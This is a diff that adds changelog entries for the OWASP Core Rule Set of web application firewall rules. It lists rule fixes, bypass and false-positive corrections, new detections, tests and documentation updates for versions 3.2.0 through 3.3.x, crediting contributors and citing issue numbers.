+ * fix: Adapt rule 942440 to work in all ModSecurity versions (Andrew Howe) [#2201]
+ * Fix bypass in rule 931130 (Andrea Menin) [#2479]
+ * Fix bypass in rule 933210 (Andrea Menin) [#2214]
+ * Fix bypass in rule 942190 (Andrea Menin) [#1910]
+ * Fix triple dot false negative in rules 930100, 930110 (Franziska Bühler) [#2309, #2310]
+ * Fix false negative in rule 942230 (Max Leske) [#2348]
+ * Fix FP in CalDAV Content-Type (Vandan Rohatgi) [#2505]
+ * Lower FP in MySQL data leakage rule (Jozef Sudolský) [#2490]
+ * Lower FP in SQL function names by splitting between PL1/PL2 (Jozef Sudolský) [#2480]
+ * Fix FP in 'having' SQLi (Felipe Zipitría) [#2248]
+ * Fix FP in JWT tokens (Andrea Menin) [#2460]
+ * Fix FP on 'time' and 'ping' keywords (Walter Hop) [#2457]
+ * Fix FP in 'application/*+json' Content-Type (Mirko Dziadzka, Walter Hop) [#2455]
+ * Fix FP in Sec-CH-UA header (Franziska Bühler) [#2361]
+ * Fix FP in PostgreSQL error messages (Jozef Sudolský, Franziska Bühler) [#1870, #2313]
+ * Fix FP in Sybase error message (Jozef Sudolský) [#2307]
+ * Fix FP in base64 content (Jozef Sudolský) [#2226]
+ * Fix FP in XMLNLS (Walter Hop) [#2192]
+ * Fix FP in rule 941310 with Russian characters (Max Leske) [#2107]
+ * Fix FP in rule 942300 by adding word boundary checks (Franziska Bühler) [#2099]
+ * Fix FP in SQLi by adding word boundary checks (Jozef Sudolský) [#2078]
+ * Fix FP in SQLi with keyword 'union' (Franziska Bühler) [#2058]
+ * Fix FP in rule 942230 with 'case' (Franziska Bühler) [#2035]
+ * Fix FP for YAM package manager (Jozef Sudolský) [#2022]
+ * Fix FP for '..' 
without slashes (Tetrik, Walter Hop) [#2016]
+ * Fix FP in rule 932115 on 'sort' (Franziska Bühler) [#2012]
+ * Fix FP in rule 933210 when cookie contains slash (Ervin Hegedus) [#1996]
+ * Fix FP in rule 932100 (Franziska Bühler) [#1954]
+ * Fix FP in Google OAuth2 (Jozef Sudolský, Christian Folini) [#1958]
+ * Nextcloud: fix FPs (kam821, Jozef Sudolský, ntimo, Felipe Zipitría, pyllyukko) [#1840, #1843, #1847, #1946]
+ * Fix FP on .axd in restricted extensions, these are public (Jozef Sudolský) [#1925]
+ * Fix FP on 'version' string in Content-Type header (Jozef Sudolský) [#1901]
+ * Fix FP in rule 941120 by adding character limit (Christian Folini) [#1872]
+ * Fix FP in Content-Type with '#' character (Jozef Sudolský) [#1856]
+ * phpMyAdmin: Fix FPs (Jozef Sudolský) [#2172, #2249, #2321, #2351]
+ * WordPress: fix FPs (Jozef Sudolský) [#1899, #1971, #2320]
+ * WordPress: fix FPs in Site Health page (Robert de Boer, Fregf, Walter Hop) [#1895, #1920]
+ * WordPress: fix FPs and improve performance (Walter Hop) [#1997, #2311]
+ * XenForo: fix FPs (Walter Hop, ThanhPT) [#1844, #1865, #1894, #1998, #2421]
+ * phpBB: Fix FPs (Jozef Sudolský) [#2057, #2180, #2299, #2343]
+ * Fix bypass in rule 933210 (Walter Hop) [#2033]
+ * Improve sampling mode efficiency (Paul Beckett) [#2094]
+ * Move rules to the lowest phase possible based on their inputs (Ervin Hegedus) [#1941]
+ * Stop decoding things twice (Federico G. 
Schwindt) [#1845]
+ * contributing.md: add more information for new developers (Andrew Howe) [#2487]
+ * Move 'ecairn' from scanners to crawlers (Felipe Zipitría) [#2408]
+ * 93231x rules: simplify already-lowercased regexps (Felipe Zipitría) [#2485]
+ * remove double m,n in regexp (Felipe Zipitría) [#2484]
+ * update OWASP vulnerability urls (Walter Hop) [#2467]
+ * docs: update policy to include signed releases (Felipe Zipitría) [#2465]
+ * Change documentation git module link to https (İlteriş Eroğlu) [#2461]
+ * Optimize regex in 942440 (Felipe Zipitría) [#2459]
+ * Improve performance by removing unnecessary lowercase transformations (Jozef Sudolský) [#2106]
+ * change-version: fix typo (Deepshikha Sinha) [#2430]
+ * Renaming tx.blocking_early to tx.early_blocking (Christian Folini) [#2414]
+ * Add editorconfig file to keep spacing in good shape (Felipe Zipitría) [#2407]
+ * Remove all whitespace at EOL (Felipe Zipitría) [#2405, #2406]
+ * 920520: improve comment (Max Leske) [#2391]
+ * Fix yamllint (Felipe Zipitría) [#2387]
+ * README: fix typos (Priyam Patel) [#2494]
+ * Initialization: fix typo (Elia Pinto) [#2366]
+ * Fix changed Trustwave URLs (Elia Pinto, henkworks, Felipe Zipitría) [#2213, #2364, #2204]
+ * Improve logging in some special cases (Jozef Sudolský) [#2347]
+ * Rename nodejs to generic category (Felipe Zipitría) [#2340]
+ * Fixed assembly of 920120-no-backtracking.data (Max leske) [#2333]
+ * Move regexp-assembly to separate directory (Felipe Zipitría) [#2327]
+ * Fix attack type of a few rules (Jozef Sudolský) [#2324]
+ * Optimize regex in 942400 (Jozef Sudolský) [#2323]
+ * Web shells: optimize regexps (Jozef Sudolský) [#2315]
+ * Move 941120 from PL1 to PL2 (Christian Folini) [#2306]
+ * Move 920300 from PL2 to PL3 (Franziska Bühler) [#2013]
+ * Fix ReDOS in rule 942350 (Andrea Menin) [#2300]
+ * Fix ReDOS in rule 941140 (Andrea Menin) [#2050]
+ * Fix false negative in rule 920480 (katef, Federico G. 
Schwindt) [#1957]
+ * Disassemble regexp in rule 930100 (Andrew Howe) [#2298]
+ * Amend 920300 to exclude CONNECT requests (Andrew Howe) [#2297]
+ * Restrict rule 941170 (Andrea Menin) [#2292]
+ * Fix NextCloud example comments (Joost de Keijzer) [#2282]
+ * Fix ruleid typos in comments (Paul Beckett) [#2263]
+ * Fix capec id for crawlers (Jozef Sudolský) [#2258]
+ * Fix docs for Apache (Jozef Sudolský) [#2238]
+ * Align actions in right order (Ervin Hegedus) [#2237]
+ * Fix logging by moving ctl action in chain to 2nd rule (Franziska Bühler) [#2202]
+ * Fix rule 9004110 to use newer format for var (Andrew Howe) [#2200]
+ * Remove the fuzzy regularity of the 942310 rule (NiceYouKnow) [#2189]
+ * docs: update links and format of known bugs (Felipe Zipitría) [#2186]
+ * Added missing " from the end of actions list (Ervin Hegedus) [#2184]
+ * sponsors.md: add file (Christian Folini) [#2174]
+ * crs-setup.conf: add note to allowed_request_content_type settings (Ervin Hegedus) [#2164]
+ * README: update for Nginx (vijayasija99) [#2158]
+ * Replace usage of ctl:ruleEngine=Off by ctl:ruleRemoveByTag=OWASP_CRS (Jozef Sudolský) [#2156]
+ * Remove old commented-out rule 910110 (Paul Beckett) [#2148]
+ * Replace Blacklist and Whitelist with Deny list and Allow list (Paul Beckett) [#2137]
+ * Fix donate URL (Felipe Zipitría) [#2132]
+ * Owncloud: Fix rule 9003001 to match both dav and webdav (Abu Dawud) [#2130]
+ * Add link to slack invitation to README (Christian Folini) [#2122]
+ * Fix bug in rule 942190 and add test case (NiceYouKnow, Max Leske, Franziska Bühler) [#2112]
+ * Added directories needed for volume mounts to Git (Max Leske) [#2103]
+ * Added a note to a commented rule about unsupported action in v3 (Ervin Hegedus) [#2098]
+ * Added missing space after comment mark (Ervin Hegedus) [#2097]
+ * Fix typo in sampling mode description (Christian Folini) [#2090]
+ * contributing.md: rewording (Christian Folini) [#2077]
+ * Replaced ARGS by ARGS_GET in rules in phase:1 
(Ervin Hegedus) [#2063]
+ * Fix OWASP Slack URL (Jozef Sudolský) [#2056]
+ * Add example exclusion rule for monitoring agents (Andrea Menin) [#2037]
+ * Fix Nginx logging in docker-compose (Felipe Zipitría) [#2036]
+ * Fix Sec-CH-UA and Sec-CH-UA-Mobile request header validation (somechris) [#2028]
+ * Fix typo in comment (Federico G. Schwindt) [#2011]
+ * Fix magic number that crashes old PHP versions (Kyzentun, Walter Hop) [#2010]
+ * Add timezone variable to docker-compose (Felipe Zipitría) [#1995]
+ * Enhancement of installation process for Nginx / IIS (Jozef Sudolský) [#1988]
+ * Removing %{MATCHED_VAR} from logging (Jozef Sudolský) [#1985]
+ * Drop unneeded capture groups (Federico G. Schwindt) [#1983]
+ * Add support for sec-ch-ua and sec-ch-ua-mobile within Validate Bytes (Chaim Sanders) [#1970]
+ * Update description of rule 920350 (Christian Folini) [#1952]
+ * Fix stricter sibling comment for SQL Injection (Stephen Sigwart) [#1913]
+ * Fix chained condition for correlation rules 980120 and 980150 (Simon Studer) [#1898]
+ * Link fix for docs/OWASP-CRS-Documentation submodule (Ervin Hegedus) [#1885]
+ * Add missing PL tags to all rules (Ervin Hegedus) [#1882]
+ * Remove 'log' from rules and let SecDefaultAction decide what to do (Federico G. Schwindt) [#1876]
+ * Remove unneeded transformation from MATCHED_VARS (Federico G. Schwindt) [#1852]
+ * Fix indentations (Ervin Hegedus) [#1851]
+ * Drop unneeded escapes (Federico G. 
Schwindt) [#1842]
+ * Tests: 100% test coverage (Christian Folini, Franziska Bühler, Paul Beckett, Ervin Hegedus, Juan-Pablo Tosso, NiceYouKnow)
+ * Tests: Normalized keys in test files (Ervin Hegedus) [#2493]
+ * Tests: Fix test titles (bxlxx.wu, Ervin Hegedus) [#2504, #2497]
+ * Tests: use same user-agent (Felipe Zipitría) [#2393]
+ * Tests: fixed end boundary in 932180-2 (Ervin Hegedus) [#2377]
+ * Tests: clean up quoting (Max Leske) [#2370]
+ * Tests: add tests for 920120 (Max Leske) [#2369]
+ * Tests: improve test setup, rewrite of log checker (Max Leske) [#2363]
+ * Tests: add common and uniform http headers to tests (Felipe Zipitría) [#2362]
+ * Tests: add tests for 921180 (Juan-Pablo Tosso, Christian Folini) [#2308]
+ * Tests: add tests for 920275, 913101, 913102, 920410, 920171, 932190, 932110, 932105 (Ervin Hegedus) [#2021, #2253, #2257, #2294, #2295, #2285, #2286, #2287]
+ * Tests: add tests for 932170, 932171, 932106, 932180, 942170, 942251, 942460 (Franziska Bühler) [#2252, #2254, #2255, #2280, #2283, #2284, #2269, #2268]
+ * Tests: add tests for 933111, 933190, 933200 (NiceYouKnow) [#2281]
+ * Tests: add tests for 920341 (Juan-Pablo Tosso) [#2266]
+ * Tests: add tests for FP 921110 request smuggling (Franziska Bühler) [#2102]
+ * Tests: Add a Chrome and Firefox version 100 UA (Mike Taylor) [#2325]
+ * Tests: Add tests for 920121, 932150, 932160, 932120, 932130, 921151 (Paul Beckett) [#2264, #2275, #2276, #2272, #2273, #2270]
+ * Tests: add test against FP when using urlDecode for 932140 (Max Leske) [#2191]
+ * Tests: fix Python version for tests (Max Leske) [#2247]
+ * Tests: fix 933160-21 and 942500-1 due to invalid URI (Takaya Saeki) [#2168]
+ * Tests: remove broken test 932100-3 (Felipe Zipitría) [#2165]
+ * Tests: fix logging problem for Nginx (vijayasija99) [#2157]
+ * Tests: use only valid YAML (Felipe Zipitría) [#2080]
+ * Tests: fix requirements version (nobletrout) [#2004]
+ * Tests: fix tests lacking charset (Felipe Zipitría) [#1932]
+
+Changes limited to documentation and tests:
+ * docs: update SPONSORS.md for new release (Christian Folini) [#3341]
+ * docs: update CONTRIBUTORS.md for new release (Ervin Hegedüs) [#3340]
+ * docs: Transferred CHANGES to CHANGES.md (Felipe Zipitría) [#2606]
+ * docs: Bring CONTRIBUTING.MD in line with documentation (Andrew Howe) [#2558]
+ * docs: Add to CONTRIBUTING.MD chain rule commenting guidance (Ervin Hegedus) [#3196]
+ * docs: Explained to leave audit log settings alone in CONTRIBUTING.md (Christian Folini) [#3090]
+ * docs: update documentation hyperlinks on rules (Dexter Chang) [#3232]
+ * docs: add documentation on blocking of archive file extensions that are not blocked by default (Andrew Howe) [#2758]
+ * docs: fixed minor typo in comment in file rules/restricted-files.data (Homesteady) [#3305]
+ * docs: Add note of lack of rule range support in ModSecv3 (Andrew Howe) [#3303]
+ * docs: sync CONTRIBUTING.MD with HTML version (Andrew Howe) [#3301]
+ * docs: fix typos across the entire project as reported by codespell (Ervin Hegedus) [#2519]
+ * tests: fix duplicated tests for rule 934130 PL1 (Walter Hop) [#2918]
+ * tests: add test for rule 941130 PL1 (Paul Beckett) [#2923]
+ * tests: increase tests (920280-3, 920430-3, 920430-9) compatibility with other proxies (Matteo Pace) [#3134]
+ * tests: detection of *nix RCE using multiple variable assignments (932200 PL2) (Christian Folini) [#2899]
+ * tests: additional tests for use in PHP wrappers in PHP injection attacks (rule 933200 PL1) (Andrew Howe) [#2723]
+ * tests: Add positive test 920100-16 for rule 920100 PL1 (Andrew Howe) [#2952]
+ * tests: Add positive test 920190-3 for rule 920190 PL1 (Andrew Howe) [#2956]
+ * tests: Add positive test 921120-4 for rule 921120 PL1 (Andrew Howe) [#3083]
+ * tests: Add positive test 920340-3 for rule 920340 PL1 (Andrew Howe) [#2972]
+ * tests: Add positive test 920250-4 for rule 920250 PL1 (Andrew Howe) [#2971]
+ * tests: Add positive test 920470-18 for rule 920470 
PL1 (Andrew Howe) [#3058]
+ * tests: Add positive test 921150-2 for rule 921150 PL1 (Andrew Howe) [#3158]
+ * tests: Add positive test 932160-8 for rule 932160 PL1 (Christian Folini) [#2997]
+ * tests: add test for `sql_compileoption_used` detection (rule 942151 PL1) (Andrew Howe) [#2714]
+ * tests: Rearranged tests for rule 920400 PL1 (Matteo Pace) [#2877]
+ * tests: fixed URLs tests for rules 934130 PL1 and 934131 PL2 (Matteo Pace) [#3133]
+ * tests: fixed URLs tests for rule 932130 PL1 (Matteo Pace) [#2880]
+ * tests: Rearranged tests for rule 920340 (Christian Folini) [#3089]
+ * tests: add test for rule 941140 PL1 (Franziska Bühler) [#2995]
+ * tests: add test for rule 941170 PL1 (Franziska Bühler) [#2994]
+ * tests: add test for rule 941200 PL1 (Franziska Bühler) [#2993]
+ * tests: add test for rule 941240 PL1 (Franziska Bühler) [#2975]
+ * tests: add test for rule 941310 PL1 (Franziska Bühler) [#2974]
+ * tests: add test for rule 941400 PL1 (Franziska Bühler) [#2969]
+ * tests: add test for rule 942170 PL1 (Franziska Bühler) [#2968]
+ * tests: add test for rule 942270 PL1 (Franziska Bühler) [#2967]
+ * tests: add test for rule 942350 PL1 (Franziska Bühler) [#2965]
+ * tests: add test for rule 942500 PL1 (Franziska Bühler) [#2964]
+ * tests: add test for rule 943100 PL1 (Franziska Bühler) [#2962]
+ * tests: add test for rule 942520 PL2 (Franziska Bühler) [#2706]
+ * tests: add tests for rules 942521 and 942522 PL2 (Franziska Bühler) [#2708]
+ * tests: fix tests on rule 932200 to detect FPs (Max Leske) [#3309]
+ * tests: deprecate ftw in favor of go-ftw (Felipe Zipitría) [#3076]
+ * tests: remove Accept-Charset from test files (Felipe Zipitría) [#2781]
+ * tests: enable utf8 encoding validation (Felipe Zipitría) [#2992]
+ * tests: fix test using old syntax and add go-ftw check (Felipe Zipitría) [#2715]
+ * tests: extend coverage for rule 932220 (Felipe Zipitría) [#3063]
+ * tests: extend coverage for rule 932120 (Felipe Zipitría) [#2996]
+ * tests: extend 
coverage for rule 932200 (Felipe Zipitría) [#2950]
+ * tests: add test to prove we cover complex shell variables usage in rule 932230 (Felipe Zipitría) [#2966]
+
+
+
+## Version 3.3.2 - 2021-06-30
+
+Fixes and improvements:
+ * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini)
+
+## Version 3.3.0 - 2020-07-01
+
+Important changes:
+ * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use.
+
+New functionality:
+ * Block backup files ending with ~ in filename (Andrea Menin)
+ * Detect ffuf vuln scanner (Will Woodson)
+ * Detect Nuclei vuln scanner (azurit)
+ * Detect SemrushBot crawler (Christian Folini)
+ * Detect WFuzz vuln scanner (azurit)
+ * New LDAP injection rule (Christian Folini)
+ * New HTTP Splitting rule (Andrea Menin)
+ * Add .swp to restricted extensions (Andrea Menin)
+ * Allow CloudEvents content types (Bobby Earl)
+ * Add CAPEC tags for attack classification (Fernando Outeda, Christian Folini)
+ * Detect Unix RCE bypass techniques via uninitialized variables, string concatenations and globbing patterns (Andrea Menin)
+
+Removed functionality:
+ * Removed outdated rule tags WASCTC, OWASP_TOP_10, OWASP_AppSensor/RE1, and OWASP_CRS/FOO/BAR; note that tags 'OWASP_CRS' and 'attack-type' are kept. (Christian Folini)
+
+Improved compatibility:
+ * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus)
+
+Fixes and improvements:
+ * WordPress: Add support for upload image/media in Gutenberg Editor (agusmu)
+ * Prevent bypass of rule 921110 (Amit Klein, Franziska Bühler)
+ * Prevent bypass of rule 921130 (Amit Klein, Franziska Bühler)
+ * fix CVE msg in rules 944120 944240 (Fernando Outeda)
+ * Remove broken or no longer used files (Federico G. 
Schwindt)
+ * Make content-type case insensitive (Franziska Bühler)
+ * Move /util/docker folder from v3.3/dev branch to dedicated repo (Peter Bittner)
+ * feat(lint): split actions in linting and regression (Felipe Zipitria)
+ * Fix FP in 921120 (Franziska Bühler)
+ * Add missing OWASP_CRS tags (Christian Folini)
+ * Fix GHA badges (Federico G. Schwindt)
+ * feat(badge): add apache license badge
+ * fix typos found by fossies codespell (Tim Herren)
+ * Decrease processing time of rules (Ervin Hegedüs)
+ * handle multiple directives in 920510 (Andrea Menin)
+ * handle multiple directives in 920510 (Andrea Menin)
+ * fix(ci): use log_contains instead (Felipe Zipitria)
+ * Move test where it belongs (Federico G. Schwindt)
+ * fix(ci): use docker in DetectionOnly (Felipe Zipitria)
+ * fix(rule): remove dangling whitespace (Felipe Zipitria)
+ * fix(ci): run actions on .github change (Felipe Zipitria)
+ * fix(docs): update badges and links in readme (Felipe Zipitria)
+ * README: update repo link (Walter Hop)
+ * Update README: Copyright 2019 -> 2020 (Christian Folini)
+ * fix(ci): run tests also on PRs (Felipe Zipitria)
+ * fix(ci): change test name and fix default params (Felipe Zipitria)
+ * Restore Travis Status (was in the wrong repo) (Christian Folini)
+ * Remove outdated Travis status after migration (Christian Folini)
+ * feat(ci): adds github actions testing (Felipe Zipitria)
+ * fix(migration): post migration tasks (Felipe Zipitria)
+ * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. 
(Felipe Zipitria)
+ * Added more explanations to comment of 920300 (Christian Folini)
+ * Added 'ver' action with current version to all necessary rules (Ervin Hegedus)
+ * Update nextcloud excl rules and shorten var (Franziska Bühler)
+ * Change to preferred lowercase var (Franziska Bühler)
+ * Set var to lowercase and change comment (Franziska Bühler)
+ * Resolve issue with allowed_request_content_types (Franziska Bühler)
+ * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko)
+ * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko)
+ * XenForo: update exclusions (Walter Hop)
+ * WordPress: exclude additional URL fields in profile editor (Walter Hop)
+ * add www to link (NullIsNot0)
+ * Fix link for 941310 Old link does not work anymore. Change it to new one. (NullIsNot0)
+ * Add Content-Type: multipart/related as allowed default (jeremyjpj0916)
+ * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler)
+ * make severities and scores consistent (Walter Hop)
+ * add QQGameHall UA (#1731) (Andrea Menin)
+ * another test (Allan Boll)
+ * Add word boundaries around values in SQL tautologies (942130) (Allan Boll)
+ * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt)
+ * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt)
+ * Fixes for 2 tests in 921200 (Christian Folini)
+ * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop)
+ * Fix FPs for 942350 (#1706) (Franziska Bühler)
+ * Fix typos found by codespell / Fossies project (#1702) (Simon Studer)
+ * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus)
+ * Narrowing down the subpattern .*? 
in 941130 (Christian Folini)
+ * Restricting a wide regex a bit (Christian Folini)
+ * Drop escapes (Christian Folini)
+ * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini)
+ * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus)
+ * Remove trailing dot in several msg actions (#1678) (Tim Herren)
+ * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (Andrea Menin)
+ * Temporary travis workaround to buy time and fix it for good (#1684) (Andrea Menin)
+ * Add regression tests (Franziska Bühler)
+ * Fix FP with create with 942360 (Franziska Bühler)
+ * Avoid embedded anchors in CRS rule 942330 (Allan Boll)
+ * Update 942450 for less false positives, more tests (#1662) (Will Woodson)
+ * Ensure single ranges are also checked (#1661) (Federico G. Schwindt)
+ * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop)
+ * For bugs, also ask for the environment (#1657) (Federico G. Schwindt)
+ * XenForo: fix incorrect escape (Walter Hop)
+ * XenForo: additional exclusions (Walter Hop)
+ * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt)
+ * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference.
+ * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt)
+ * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt)
+ * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner)
+ * Also ask for the paranoia level (Federico G. 
Schwindt)
+ * Make it a tiny bit more colorful (Federico G. Schwindt)
+ * Spacing (Federico G. Schwindt)
+ * Fix emoji (Federico G. Schwindt)
+ * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt)
+ * Fix paranoia-level log description (Andrea Menin)
+ * change IRC to Slack (Walter Hop)
+ * fix spacing (Walter Hop)
+ * Moving tests and documentation folders (#1627) (Soufiane Benali)
+ * add triggered rule (#1636) (Andrea Menin)
+ * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt)
+ * Mark stale issues (Federico G. Schwindt)
+ * Added support for >). Use negated classes for better performance. (Federico G. Schwindt)
+ * Add test for issue #1580 (#1612) (Federico G. Schwindt)
+ * removes t:lowercase (Andrea Menin)
+ * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt)
+ * Add PL1 tag. (Anna Winkler)
+ * Change version number for full version name (Felipe Zipitria)
+ * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria)
+ * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria)
+ * Ignore configuration files generated by the JetBrains editors (Anna Winkler)
+ * Update name of branch to use for feature branches. Minor syntax updates. 
(Anna Winkler)
+ * Minor optimisation (Emile-Hugo SPIR)
+ * Also fix the `as herefrom` pattern (Emile-Hugo SPIR)
+ * More conservative fix (Emile-Hugo SPIR)
+ * Update the source file (Emile-Hugo SPIR)
+ * Fix a FP (`, aside from`) (Emile-Hugo SPIR)
+ * regression fix for #1581 (emphazer)
+ * Change order to check ip first in both rules (Felipe Zipitria)
+ * Change chain order (Felipe Zipitria)
+ * Fix spacing in text (Felipe Zipitria)
+ * Add link to mailing list archives (Felipe Zipitria)
+ * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 941270 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini)
+ * Update mailing list links to google group (Felipe Zipitria)
+ * Fix typo and add 2 new entries to 941160 (Franziska Bühler)
+ * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt)
+ * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. 
Schwindt)
+ * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren)
+ * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren)
+ * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt)
+ * fix rule regex due to remove t:removeComments (Andrea Menin)
+ * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren)
+ * update Dockerfiles and Travis to use v3.3/dev (Walter Hop)
+
+## Version 3.2.0 - 2019-09-24
+
+New functionality:
+ * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler)
+ * Add docker-compose.yaml and example rule exclusion files for docker-compose (Franziska Bühler)
+ * Add extended access.log format to Docker (Franziska Bühler)
+ * Add libinjection check on last path segment (Max Leske, Christian Folini)
+ * Add PUBLIC identifier for XML entities (#1490) (Rufus125)
+ * Add .rdb to default restricted_extensions (Walter Hop)
+ * Add .swp to default restricted_extensions (Andrea Menin)
+ * Add rule 933200 PHP Wrappers (Andrea Menin)
+ * Add send-payload-pls.sh script to test payload against multiple paranoia levels (Christian Folini, Manuel Spartan)
+ * Add support for shell evasions with $IFS (Walter Hop, Chaim Sanders)
+ * Add unix-shell commands (Christoph Hansen, Chaim Sanders)
+ * Also inspect the path for the script tag (Federico G. 
Schwindt)
+ * Detect 80legs, sysscan, Gobuster scanners (Brent Clark)
+ * Detect CGI source code leakages (Christoph Hansen, Walter Hop)
+ * Detect 'crawler' user-agent (Federico G. Schwindt)
+ * Detect Jorgee, Zgrab scanners (Walter Hop)
+ * Detect MySQL in-line comments (Franziska Bühler)
+ * Detect Wappalyzer scanner (Christian Folini, Chaim Sanders)
+ * Java RCE: Add struts namespaces (Walter Hop)
+ * Java RCE: Detect more java classes (Manuel Leos)
+ * Javascript: Add 941370 preventing a bypass for 941180 (Andrea Menin)
+ * Make CRS variables configurable in Docker image (Franziska Bühler)
+ * New PL3 rule 920490 to protect against content-type charset bypassing (Christian Folini)
+ * Node.js unserialization + javascript RCE snippets (Walter Hop)
+ * Request smuggling: Also cover pre http/1.0 requests (Federico G. Schwindt)
+ * Restricted files: Added many dotfiles (Dan Ehrlich)
+ * SQLi bypass detection: ticks and backticks (Franziska Bühler)
+ * XenForo rule exclusion profile (Walter Hop)
+
+Removed functionality:
+ * Remove unused protected_uploads setting from setup (Walter Hop)
+ * Remove deprecated tx.msg and tx.%{rule.id}-... (Federico G. Schwindt)
+ * Remove deprecated upgrade script (Walter Hop)
+
+Improved compatibility:
+ * Add OWASP_CRS tags for ModSec 3 changes and replace ruleRemoveTargetByTag arguments (Ervin Hegedus)
+ * Replace @contain % with @rx 25; ModSec 3 fails to parse % by itself (or escaped). (Federico G. Schwindt)
+ * RE2 compatibility for 941130, 920220, 920240, 920230, 920460, 942200, 942370 (Allan Boll)
+ * Hyperscan compatibility and simplification for 942450 (Allan Boll)
+
+Fixes and improvements:
+ * 932140: fix ReDoS in FOR expression (Walter Hop)
+ * 933200: Simplify pattern (Federico G. 
Schwindt, Andrea Menin)
+ * 941380: fix anomaly score variable (Franziska Bühler)
+ * 942510, 942511: fix anomaly score variable (Walter Hop)
+ * Add content-type application/csp-report (Andrea Menin)
+ * Add content-type application/xss-auditor-report (Andrea Menin)
+ * Add CRS 3.2 Badge build support. (Chaim Sanders)
+ * Add CVE numbers for Apache Struts vulnerabilities to comments in rules (Franziska Bühler)
+ * Add CVE-2018-11776 to comments of 933160 and 933161 (Franziska Bühler)
+ * Add CVE-2018-2380 to comments of rules (Franziska Bühler)
+ * Add default env vars for anomaly scores in Docker (Franziska Bühler)
+ * Add missing OWASP_CRS tags to 921xxx rules (Walter Hop)
+ * Add REQUEST_FILENAME to rule id 944130 and add exploits to comment (Franziska Bühler)
+ * Add spaces in front of closing square brackets (Franziska Bühler)
+ * Add travis changes (#1316) (Chaim Sanders)
+ * Allow dot characters in Content-Type multipart boundary (Walter Hop)
+ * Also handle dot variant of X_Filename. PHP will transform dots to underscore in variable names since dot is invalid. (Federico G. Schwindt)
+ * As per the ref manual, it is compressWhitespace (Federico G. Schwindt)
+ * Avoid php leak false positive with WOFF files (Manuel Spartan)
+ * Bring back CRS 2.x renumbering utility (Walter Hop)
+ * Clean up travis and reorg (Federico G. Schwindt)
+ * Code cosmetics: reorder the actions of rules (Ervin Hegedus)
+ * Content-Type is case insensitive (Federico G. Schwindt)
+ * Disassembled 941160 (Franziska Bühler)
+ * Drop separate regexp files. They are not really needed and save us from updating multiple places. (Federico G. Schwindt)
+ * Drop t:lowercase from 941350 (Federico G. Schwindt)
+ * Drop unneeded capture groups and tidy up (Federico G. Schwindt)
+ * Drop unneeded capture groups and tidy up regexps (Federico G. Schwindt)
+ * Drop unneeded unicode from 941110. Add tests to cover a few more variants as well as a negative test (Federico G. 
Schwindt)
+ * Fix 920440 "URL file extension is restricted by policy" regex (Andrea Menin)
+ * Fix 920460 test (Federico G. Schwindt)
+ * Fix 942101 and 942460 by adding to sqli_score variable (Christian Folini)
+ * Fix checking the existence of 'HTTP' trailing request verb and request path in the payload for HTTP request smuggling; decreases false-positives on free-form text. (Yu Yagihashi)
+ * Fix commit default for non 2.9 branch (Chaim Sanders)
+ * Fix CRS2->CRS3 mapping table (973344 -> 941100) (Chaim Sanders)
+ * Fix date (Chaim Sanders)
